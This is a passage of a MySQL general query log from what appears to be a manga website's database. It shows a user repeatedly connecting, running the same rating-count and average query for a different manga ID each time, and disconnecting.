u317079482_mangacherri_2 using Socket 330643902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330643902 Quit 330643903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330643903 Quit 330643904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330643904 Quit 330643905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330643905 Quit 330643906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330643906 Quit 330643907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330643907 Quit 330643908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330643908 Quit 330643909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330643909 Quit 330643910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330643910 Quit 330643911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330643911 Quit 330643912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330643912 Quit 330643913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330643913 Quit 330643914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330643914 Quit 330643915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330643915 Quit 330643916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330643916 Quit 330643917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330643917 Quit 330643918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330643918 Quit 330643919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330643919 Quit 330643920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330643920 Quit 330643921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330643921 Quit 330643922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330643922 Quit 330643923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330643923 Quit 330643924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330643924 Quit 330643925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330643925 Quit 330643926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330643926 Quit 330643927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330643927 Quit 330643928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330643928 Quit 330643929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330643929 Quit 330643930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330643930 Quit 330643931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330643931 Quit 330643932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330643932 Quit 330643933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330643933 Quit 330643934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330643934 Quit 330643935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330643935 Quit 330643936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330643936 Quit 330643937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330643937 Quit 330643938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330643938 Quit 330643939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330643939 Quit 330643940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330643940 Quit 330643941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330643941 Quit 330643942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330643942 Quit 330643943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330643943 Quit 330643944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330643944 Quit 330643945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330643945 Quit 330643946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330643946 Quit 330643947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330643947 Quit 330643948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330643948 Quit 330643949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330643949 Quit 330643950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330643950 Quit 330643951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330643951 Quit 330643952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330643952 Quit 330643953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330643953 Quit 330643954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330643954 Quit 330643955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330643955 Quit 330643956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330643956 Quit 330643957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330643957 Quit 330643958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330643958 Quit 330643959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330643959 Quit 330643960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330643960 Quit 330643961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330643961 Quit 330643962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330643962 Quit 330643963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330643963 Quit 330643964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330643964 Quit 330643965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330643965 Quit 330643966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330643966 Quit 330643967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330643967 Quit 330643968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330643968 Quit 330643969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330643969 Quit 330643970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330643970 Quit 330643971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330643971 Quit 330643972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330643972 Quit 330643973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330643973 Quit 330643974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330643974 Quit 330643975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330643975 Quit 330643976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330643976 Quit 330643977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330643977 Quit 330643978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330643978 Quit 330643979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330643979 Quit 330643980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330643980 Quit 330643981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330643981 Quit 330643982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330643982 Quit 330643983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330643983 Quit 330643984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330643984 Quit 330643985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330643985 Quit 330643986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330643986 Quit 330643987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330643987 Quit 330643988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330643988 Quit 330643989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330643989 Quit 330643990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330643990 Quit 330643991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330643991 Quit 330643992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330643992 Quit 260225 19:28:27 330643993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330643993 Quit 330643994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330643994 Quit 330643995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330643995 Quit 330643996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330643996 Quit 330643997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330643997 Quit 330643998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330643998 Quit 330643999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330643999 Quit 330644000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330644000 Quit 330644001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330644001 Quit 330644002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330644002 Quit 330644003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330644003 Quit 330644004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330644004 Quit 330644005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330644005 Quit 330644006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330644006 Quit 330644007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330644007 Quit 330644008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330644008 Quit 330644009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330644009 Quit 330644010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330644010 Quit 330644011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330644011 Quit 330644012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330644012 Quit 330644013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330644013 Quit 330644014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330644014 Quit 330644015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330644015 Quit 330644016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330644016 Quit 330644017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330644017 Quit 330644018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330644018 Quit 330644019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330644019 Quit 330644020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330644020 Quit 330644021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330644021 Quit 330644022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330644022 Quit 330644023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330644023 Quit 330644024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330644024 Quit 330644025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330644025 Quit 330644026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330644026 Quit 330644027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330644027 Quit 330644028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330644028 Quit 330644029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330644029 Quit 330644030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330644030 Quit 330644031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330644031 Quit 330644032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330644032 Quit 330644033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330644033 Quit 330644034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330644034 Quit 330644035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330644035 Quit 330644036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330644036 Quit 330644037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330644037 Quit 330644038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330644038 Quit 330644039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330644039 Quit 330644040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330644040 Quit 330644041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330644041 Quit 330644042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330644042 Quit 330644043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330644043 Quit 330644044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330644044 Quit 330644045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330644045 Quit 330644046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330644046 Quit 330644047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330644047 Quit 330644048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330644048 Quit 330644049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330644049 Quit 330644050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330644050 Quit 330644051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330644051 Quit 330644052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330644052 Quit 330644053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330644053 Quit 330644054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330644054 Quit 330644055 Connect 